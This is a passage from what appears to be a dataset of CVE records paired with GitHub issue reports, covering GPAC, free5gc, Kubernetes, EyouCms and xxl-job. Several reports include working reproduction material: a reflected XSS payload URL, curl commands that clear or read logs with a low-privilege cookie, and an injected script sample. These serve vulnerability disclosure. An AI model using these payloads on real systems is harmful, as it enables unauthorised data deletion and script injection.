0xc0001c0150?})\n\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc0001c0140?, 0xc0001c0138?, 0x7f29fbf11548?})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:637 +0x185\ngithub.com/wmnsk/go-pfcp/message.(*HeartbeatRequest).UnmarshalBinary(0xc000182630, {0xc0001c0138, 0x15, 0x15})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0xb3\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc0001c0138, 0x15, 0x15})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x325\ngithub.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main(0xc0001de0d0, 0xc0001d60d0)\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\ncreated by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).Start in goroutine 1\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" ```
[Bugs] UPF crash caused by PFCP messages whose 2rd IE type larger than 0x7fff
https://api.github.com/repos/free5gc/free5gc/issues/482/comments
3
2023-09-22T02:57:53Z
2023-11-02T04:51:21Z
https://github.com/free5gc/free5gc/issues/482
1,908,102,486
482
5,741
CVE-2023-47384
2023-11-14T20:15:08.417
MP4Box GPAC v2.3-DEV-rev617-g671976fcc-master was discovered to contain a memory leak in the function gf_isom_add_chapter at /isomedia/isom_write.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2672" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2672" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev617-g671976fcc-master:*:*:*:*:*:*:*", "matchCriteriaId": "F540C691-D615-4A9B-8DD6-69B8488E3BA1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/2672
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
1、Version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D 2、ASAN Log [Dasher] No template assigned, using $File$_dash$FS$$Number$ [IsoMedia] Failed to fetch initial sample 1 for track 1 [IsoMedia] Failed to fetch initial sample 1 for track 1 AddressSanitizer:DEADLYSIGNAL ================================================================= ==3416==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7f340d3b22bc bp 0x7fff33ecd7f0 sp 0x7fff33eccf78 T0) ==3416==The signal is caused by a READ memory access. ==3416==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used. #0 0x7f340d3b22bc (/lib/x86_64-linux-gnu/libc.so.6+0x1b22bc) #1 0x7f340f85b8ce in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:450 #2 0x7f340e473095 in gf_isom_add_chapter isomedia/isom_write.c:3182 #3 0x7f340ee901db in mp4_mux_setup_pid filters/mux_isom.c:3763 #4 0x7f340eb04d02 in gf_filter_pid_configure filter_core/filter_pid.c:876 #5 0x7f340eb09a3c in gf_filter_pid_connect_task filter_core/filter_pid.c:1230 #6 0x7f340eb4642f in gf_fs_thread_proc filter_core/filter_session.c:2105 #7 0x7f340eb4d74e in gf_fs_run filter_core/filter_session.c:2405 #8 0x7f340e5b8626 in gf_dasher_process media_tools/dash_segmenter.c:1236 #9 0x560c71d604d9 in do_dash /home/returnzero/gpac/applications/mp4box/mp4box.c:4831 #10 0x560c71d604d9 in mp4box_main /home/returnzero/gpac/applications/mp4box/mp4box.c:6245 #11 0x7f340d229d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #12 0x7f340d229e3f in __libc_start_main_impl ../csu/libc-start.c:392 #13 0x560c71cf6214 in _start (/home/returnzero/gpac/bin/gcc/MP4Box+0x4e214) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x1b22bc) ==3416==ABORTING 3、Reproduction ./MP4Box -dash 10000 $poc 4、poc [crash65.zip](https://github.com/gpac/gpac/files/13225281/crash65.zip) 5、Impact This vulnerability is capable of causing crashes, or lead to dos. 6、 Env Linux returnzero-virtual-machine 6.2.0-36-generic #37~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 9 15:34:04 UTC 2 x86_64 x86_64 x86_64 GNU/Linux AFL++ 4.09a 7、Credit ReturnZero
Memory Leak in gf_isom_add_chapter isomedia/isom_write.c:3182
https://api.github.com/repos/gpac/gpac/issues/2672/comments
0
2023-11-01T09:16:33Z
2023-12-04T10:07:48Z
https://github.com/gpac/gpac/issues/2672
1,971,994,862
2,672
5,742
CVE-2023-5528
2023-11-14T21:15:14.123
A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they are using an in-tree storage plugin for Windows nodes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/kubernetes/kubernetes/issues/121879" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/SL_d4NR8pzA" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/kubernetes/kubernetes/issues/121879" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/SL_d4NR8pzA" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3JH444PWZBINXLLFV7XLIJIZJHSK6UEZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4XZIX727JIKF5RQW7RVVBLWXBCDIBJA7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7MPGMITSZXUCAVO7Q75675SOLXC2XXU4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20240119-0009/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "25FFBC6E-DCE9-4596-8ABE-AC6B6564AA40", "versionEndExcluding": "1.25.16", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "28E3CB24-4305-4E08-AD34-D29AE795FA4A", "versionEndExcluding": "1.26.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.26.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "45E6B088-8FC7-476A-A661-A9402F857C4A", "versionEndExcluding": "1.27.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.27.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C9231AD-C3B9-4531-9052-0317AA506B0B", "versionEndExcluding": "1.28.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.28.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/121879
[ "Issue Tracking", "Patch" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) - **HIGH** (7.2) A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they are using an in-tree storage plugin for Windows nodes. ### Am I vulnerable? Any kubernetes environment with Windows nodes is impacted. Run `kubectl get nodes -l kubernetes.io/os=windows` to see if any Windows nodes are in use. #### Affected Versions - kubelet >= v1.8.0 (including all later minor versions) ### How do I mitigate this vulnerability? The provided patch fully mitigates the vulnerability. Outside of applying the provided patch, there are no known mitigations to this vulnerability. #### Fixed Versions - kubelet master - fixed by #121881 - kubelet v1.28.4 - fixed by #121882 - kubelet v1.27.8 - fixed by #121883 - kubelet v1.26.11 - fixed by #121884 - kubelet v1.25.16 - fixed by #121885 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Persistent Volume create events with local path fields containing special characters are a strong indication of exploitation. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by Tomer Peled [@tomerpeled92](https://github.com/tomerpeled92) The issue was fixed and coordinated by the fix team: James Sturtevant @jsturtevant Mark Rossetti @marosset Michelle Au @msau42 Jan Šafránek @jsafrane Mo Khan @enj Rita Zhang @ritazh Micah Hausler @micahhausler Sri Saran Balaji @SaranBalaji90 Craig Ingram @cji and release managers: Jeremy Rickard @jeremyrickard Marko Mudrinić @xmudrii /area security /kind bug /committee security-response /label official-cve-feed /sig windows /sig storage /area kubelet
CVE-2023-5528: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes
https://api.github.com/repos/kubernetes/kubernetes/issues/121879/comments
1
2023-11-14T15:54:16Z
2023-11-16T13:42:24Z
https://github.com/kubernetes/kubernetes/issues/121879
1,993,034,362
121,879
5,743
CVE-2023-41597
2023-11-15T06:15:27.893
EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/emlog/emlog/issues/238" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/emlog/emlog/issues/238" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/emlog/emlog/issues/238
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "emlog", "emlog" ]
EyouCms v1.6.2 存在反射型XSS漏洞,系twitter.php文件中active_t参数过滤不严。 ![image](https://github.com/emlog/emlog/assets/66168888/8e41f4b6-11a5-4f38-8646-8b56be13c0cd) 攻击者构造恶意链接: /admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 登陆后的用户触发xss。 ![image](https://github.com/emlog/emlog/assets/66168888/e1cd5c6a-43c0-4e78-afa0-7225ed003131)
EyouCms v1.6.2 存在反射型XSS漏洞
https://api.github.com/repos/emlog/emlog/issues/238/comments
2
2023-07-23T08:55:00Z
2023-11-16T08:47:03Z
https://github.com/emlog/emlog/issues/238
1,817,047,912
238
5,744
CVE-2023-48087
2023-11-15T15:15:07.453
xxl-job-admin 2.4.0 is vulnerable to Insecure Permissions via /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xuxueli/xxl-job/issues/3330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xuxueli/xxl-job/issues/3330" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "122ECDB6-272C-4B31-907E-E9FFB36305EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/xuxueli/xxl-job/issues/3330
[ "Exploit", "Issue Tracking" ]
github.com
[ "xuxueli", "xxl-job" ]
### Environment MySQL 5.7.44, XXL-Job-Admin 2.4.0 Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin) Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor) ### Vulnerability Information It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss. ### Steps to reproduce the behavior Step 1: Create a normal user without any privilege inside the web console as below ![image](https://github.com/xuxueli/xxl-job/assets/150101148/a67d6c8f-539c-4866-8bbd-6ae31917066a) Step 2: Retrieve the cookie for the user ![image](https://github.com/xuxueli/xxl-job/assets/150101148/f1529ae7-d2ae-4723-9e4e-35183723936a) Step 3: Run the following command for testing log query ` curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'` ![image](https://github.com/xuxueli/xxl-job/assets/150101148/397e7e53-97aa-487f-8c57-f3c68e1b8e28) It can show the successful log query and return 200 status. Step 4: Run the following command for log clearing ` curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9' ` ![image](https://github.com/xuxueli/xxl-job/assets/150101148/d6c2abd2-2f16-43c4-b1a1-0807d43e18aa) it will return 200 status. Step 5. Show the log in the console. It will show that all log is cleared successfully by normal user. ![image](https://github.com/xuxueli/xxl-job/assets/150101148/6ef1817f-ffba-4667-b991-fba27e578a2e)
Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat
https://api.github.com/repos/xuxueli/xxl-job/issues/3330/comments
3
2023-11-08T02:32:23Z
2025-01-08T15:13:33Z
https://github.com/xuxueli/xxl-job/issues/3330
1,982,605,023
3,330
5,745
CVE-2023-48088
2023-11-15T15:15:07.510
xxl-job-admin 2.4.0 is vulnerable to Cross Site Scripting (XSS) via /xxl-job-admin/joblog/logDetailPage.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xuxueli/xxl-job/issues/3329" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xuxueli/xxl-job/issues/3329" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "122ECDB6-272C-4B31-907E-E9FFB36305EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xuxueli/xxl-job/issues/3329
[ "Exploit", "Issue Tracking" ]
github.com
[ "xuxueli", "xxl-job" ]
### Environment MySQL 5.7.44, XXL-Job-Admin 2.4.0 Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin) Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor) ### Vulnerability Information During the query of /xxl-job-admin/joblog/logDetailPage, the xxl-job-admin will query the related log directly in the machine and show it in the console in HTML format even if the log appears in <script> </script> format ### Steps to reproduce the behavior Step 1: Modify the application log in default path of XXL-Job-Executor and add malicious javascript ` cd /data/applogs/xxl-job/jobhandler/yyyy-mm-dd/` ![image](https://github.com/xuxueli/xxl-job/assets/150101148/a801ba9f-38a2-4bb0-807e-bbc3132947f1) Example malicious code `<script>alert(Test123);</script>` ![image](https://github.com/xuxueli/xxl-job/assets/150101148/dc9be914-7997-4dca-945e-6214c95204a9) Step 2: Login to the XXL-Job-Admin console by admin user and navigate to Log Query Page Check the log by querying log id ![image](https://github.com/xuxueli/xxl-job/assets/150101148/08ded6af-6a3c-4182-8651-2839ad99abc7) Step 3: Alert will show here ![image](https://github.com/xuxueli/xxl-job/assets/150101148/e751315a-6fd4-4169-b407-7c19f8457e05)
XSS attack appears in /xxl-job-admin/joblog/logDetailPage
https://api.github.com/repos/xuxueli/xxl-job/issues/3329/comments
1
2023-11-08T02:03:54Z
2023-11-23T09:50:55Z
https://github.com/xuxueli/xxl-job/issues/3329
1,982,577,272
3,329
5,746
CVE-2023-48011
2023-11-15T19:15:07.693
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a heap-use-after-free via the flush_ref_samples function at /gpac/src/isomedia/movie_fragments.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/c70f49dda4946d6db6aa55588f6a756b76bd84ea" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2611" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/c70f49dda4946d6db6aa55588f6a756b76bd84ea" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2611" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev566-g50c2ab06f-master:*:*:*:*:*:*:*", "matchCriteriaId": "ECEFB340-26A2-43CD-A8DC-518262E4DC36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/2611
[ "Exploit", "Issue Tracking" ]
github.com
[ "gpac", "gpac" ]
# Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` [33m[iso file] extra box maxr found in hinf, deleting [0m[32m[iso file] Unknown box type traI in parent moov [0m[33m[iso file] Box "stss" (start 9939) has 32 extra bytes [0m[33m[iso file] extra box maxr found in hinf, deleting [0m[33m[iso file] Track with no sample description box ! [0m[33m[IsoMedia] Track 4 type MPEG not natively handled [0m[32m[Dasher] No template assigned, using $File$_dash$FS$$Number$ [0m[32m[iso file] Unknown box type traI in parent moov [0m[33m[MP4Mux] muxing unknown codec ID Codec Not Supported, using generic sample entry with 4CC "MPEG" [0m[31m[IsoMedia] File truncated, aborting read for track 1 [0m[37mDashing P1 AS#1.1(V) done (1 segs) [0m[31m[MP4Mux] Failed to add sample DTS 0 from O7 - prev DTS 18446744073709551615: Out Of Memory [0m================================================================= ==836900==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000001d88 at pc 0x7f57c0120bf1 bp 0x7ffeac405a70 sp 0x7ffeac405a68 READ of size 8 at 0x60b000001d88 thread T0 #0 0x7f57c0120bf0 in flush_ref_samples /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:936:37 #1 0x7f57c0128df2 in gf_isom_close_segment /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:2331:4 #2 0x7f57c0cfd198 in mp4_mux_process_fragmented /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:6734:8 #3 0x7f57c0cf46f3 in mp4_mux_process /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:7273:14 #4 0x7f57c09afa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7 #5 0x7f57c097d47b in gf_fs_thread_proc /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2105:3 #6 0x7f57c097b5cf in gf_fs_run /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2405:3 #7 0x7f57c022ac6a in gf_dasher_process /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:1236:6 #8 0x55ff536546dc in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4831:15 #9 0x55ff53645b6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7 #10 0x7f57bf229d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #11 0x7f57bf229e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #12 0x55ff5356ddd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) 0x60b000001d88 is located 104 bytes inside of 112-byte region [0x60b000001d20,0x60b000001d90) freed by thread T0 here: #0 0x55ff535f0972 in free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) #1 0x7f57c001e6f5 in gf_isom_box_del /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:2005:3 previously allocated by thread T0 here: #0 0x55ff535f0c1e in malloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105c1e) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) #1 0x7f57bff95c5a in trun_box_new 